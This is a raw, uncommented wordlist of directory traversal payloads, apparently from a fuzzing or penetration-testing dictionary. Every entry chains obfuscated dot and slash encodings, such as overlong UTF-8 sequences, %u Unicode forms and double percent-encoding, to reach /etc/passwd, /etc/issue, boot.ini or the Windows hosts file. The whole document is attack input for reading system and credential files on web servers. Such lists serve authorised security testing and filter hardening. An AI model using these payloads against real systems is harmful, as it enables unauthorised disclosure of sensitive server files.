-%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cpasswd -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cissue -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cboot.ini -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cpasswd -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cissue -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cboot.ini -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cpasswd -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cissue -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cboot.ini -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cpasswd -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cissue -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cboot.ini -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cpasswd -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cetc%c1%1cissue -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cboot.ini -%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1c%%c0%6e%c0%6e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%%c0%6e%c0%6e%c1%afetc%c1%afpasswd -%%c0%6e%c0%6e%c1%afetc%c1%afissue -%%c0%6e%c0%6e%c1%afboot.ini -%%c0%6e%c0%6e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afpasswd -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afissue -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afboot.ini -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afpasswd -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afissue -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afboot.ini -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afpasswd -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afissue -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afboot.ini -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afpasswd -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afissue -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afboot.ini -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afpasswd -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afetc%c1%afissue -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afboot.ini -%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%af%%c0%6e%c0%6e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%%c0%6e%c0%6e%bg%qfetc%bg%qfpasswd -%%c0%6e%c0%6e%bg%qfetc%bg%qfissue -%%c0%6e%c0%6e%bg%qfboot.ini -%%c0%6e%c0%6e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfpasswd -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfissue -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfboot.ini -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfpasswd -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfissue -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfboot.ini -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfpasswd -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfissue -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfboot.ini -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfpasswd -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfissue -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfboot.ini -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfpasswd -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfetc%bg%qfissue -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfboot.ini -%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qf%%c0%6e%c0%6e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%%c0%6e%c0%6e%u2215etc%u2215passwd -%%c0%6e%c0%6e%u2215etc%u2215issue -%%c0%6e%c0%6e%u2215boot.ini -%%c0%6e%c0%6e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215passwd -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215issue -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215boot.ini -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215passwd -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215issue -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215boot.ini -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215passwd -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215issue -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215boot.ini -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215passwd -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215issue -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215boot.ini -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215passwd -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215etc%u2215issue -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215boot.ini -%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215%%c0%6e%c0%6e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%%c0%6e%c0%6e%u2216etc%u2216passwd -%%c0%6e%c0%6e%u2216etc%u2216issue -%%c0%6e%c0%6e%u2216boot.ini -%%c0%6e%c0%6e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216passwd -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216issue -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216boot.ini -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216passwd -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216issue -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216boot.ini -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216passwd -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216issue -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216boot.ini -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216passwd -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216issue -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216boot.ini -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216passwd -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216etc%u2216issue -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216boot.ini -%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216%%c0%6e%c0%6e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%%c0%6e%c0%6e%uEFC8etc%uEFC8passwd -%%c0%6e%c0%6e%uEFC8etc%uEFC8issue -%%c0%6e%c0%6e%uEFC8boot.ini -%%c0%6e%c0%6e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8passwd -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8issue -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8boot.ini -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8passwd -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8issue -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8boot.ini -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8passwd -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8issue -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8boot.ini -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8passwd -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8issue -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8boot.ini -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8passwd -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8etc%uEFC8issue -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8boot.ini -%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8%%c0%6e%c0%6e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%%c0%6e%c0%6e%uF025etc%uF025passwd -%%c0%6e%c0%6e%uF025etc%uF025issue -%%c0%6e%c0%6e%uF025boot.ini -%%c0%6e%c0%6e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025passwd -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025issue -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025boot.ini -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025passwd -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025issue -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025boot.ini -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025passwd -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025issue -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025boot.ini -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025passwd -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025issue -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025boot.ini -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025passwd -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025etc%uF025issue -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025boot.ini -%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025%%c0%6e%c0%6e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd -%%c0%6e%c0%6e%%32%%66etc%%32%%66issue -%%c0%6e%c0%6e%%32%%66boot.ini -%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66issue -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66boot.ini -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66issue -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66boot.ini -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66issue -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66boot.ini -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66issue -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66boot.ini -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66passwd -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66etc%%32%%66issue -%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66boot.ini 